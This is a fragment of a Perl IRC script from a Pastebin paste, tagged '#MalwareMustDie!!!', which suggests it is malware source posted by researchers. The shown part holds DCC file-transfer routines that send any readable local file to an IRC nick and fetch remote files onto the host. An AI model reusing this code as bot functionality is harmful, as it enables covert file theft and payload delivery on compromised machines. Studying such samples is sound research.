  777.      }
  778.    }
  779. }
  780.  
  781. sub SEND {
  782.   my ($nick, $arquivo) = @_;
  783.   unless (-r "$arquivo") {
  784.     return(0);
  785.   }
  786.   my $dccark = $arquivo;
  787.   $dccark =~ s/[.*\/](\S+)/$1/;
  788.   my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
  789.   my $longip = unpack("N",inet_aton($meuip));
  790.   my @filestat = stat($arquivo);
  791.   my $size_total=$filestat[7];
  792.   if ($size_total == 0) {
  793.      return(0);
  794.   }
  795.   my ($porta, $sendsock);
  796.   do {
  797.     $porta = int rand(64511);
  798.     $porta += 1024;
  799.     $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
  800.   } until $sendsock;
  801.   $DCC{$sendsock}{tipo} = 'send';
  802.   $DCC{$sendsock}{nick} = $nick;
  803.   $DCC{$sendsock}{bytes} = $size_total;
  804.   $DCC{$sendsock}{arquivo} = $arquivo;
  805.   &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
  806. }
  807. sub GET {
  808.   my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
  809.   return(0) if (-e "$arquivo");
  810.   if (open(FILE, "> $arquivo")) {
  811.      close FILE;
  812.   } else {
  813.     return(0);
  814.   }
  815.   my $dccip=fixaddr($dcclongip);
  816.   return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
  817.   my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
  818.   $dccsock->autoflush(1);
  819.   $dcc_sel->add($dccsock);
  820.   $DCC{$dccsock}{tipo} = 'get';
  821.   $DCC{$dccsock}{itime} = time;
  822.   $DCC{$dccsock}{nick} = $nick;
  823.   $DCC{$dccsock}{bytes} = $bytes;
  824.   $DCC{$dccsock}{curbyte} = 0;
  825.   $DCC{$dccsock}{arquivo} = $arquivo;
  826.   $DCC{$dccsock}{ip} = $dccip;
  827.   $DCC{$dccsock}{porta} = $dccporta;
  828.   $DCC{$dccsock}{status} = "Recebendo";
  829. }
  830. sub Status {
  831.   my $socket = shift;
  832.   my $sock_tipo = $DCC{$socket}{tipo};
  833.   unless (lc($sock_tipo) eq "chat") {
  834.     my $nick = $DCC{$socket}{nick};
  835.     my $arquivo = $DCC{$socket}{arquivo};
  836.     my $itime = $DCC{$socket}{itime};
  837.     my $ftime = time;
  838.     my $status = $DCC{$socket}{status};
  839.     $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
  840.  
  841.     my $d_time = $ftime-$itime;
  842.  
  843.     my $cur_byte = $DCC{$socket}{curbyte};
  844.     my $bytes_total =  $DCC{$socket}{bytes};
  845.  
  846.     my $rate = 0;
  847.     $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
  848.     my $porcen = ($cur_byte*100)/$bytes_total;
  849.  
  850.     my ($r_duv, $p_duv);
  851.     if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
  852.        $r_duv = $3; $r_duv++ if $4 >= 5;
  853.        $rate = "$1\.$2"."$r_duv";
  854.     }
  855.     if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
  856.        $p_duv = $3; $p_duv++ if $4 >= 5;
  857.        $porcen = "$1\.$2"."$p_duv";
  858.     }
  859.     return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
  860.   }
  861.   return(0);
  862. }
  863.  
  864. sub fixaddr {
  865.     my ($address) = @_;
  866.  
  867.     chomp $address;
  868.     if ($address =~ /^\d+$/) {
  869.         return inet_ntoa(pack "N", $address);
  870.     } elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
  871.         return $address;
  872.     } elsif ($address =~ tr/a-zA-Z//) {
  873.         return inet_ntoa(((gethostbyname($address))[4])[0]);
  874.     } else {
  875.         return;
  876.     }
  877. }
  878.  
  879. ---
  880. #MalwareMustDie!!!
RAW Paste Data
Pastebin PRO Summer Special!
Get 60% OFF on Pastebin PRO accounts!
Top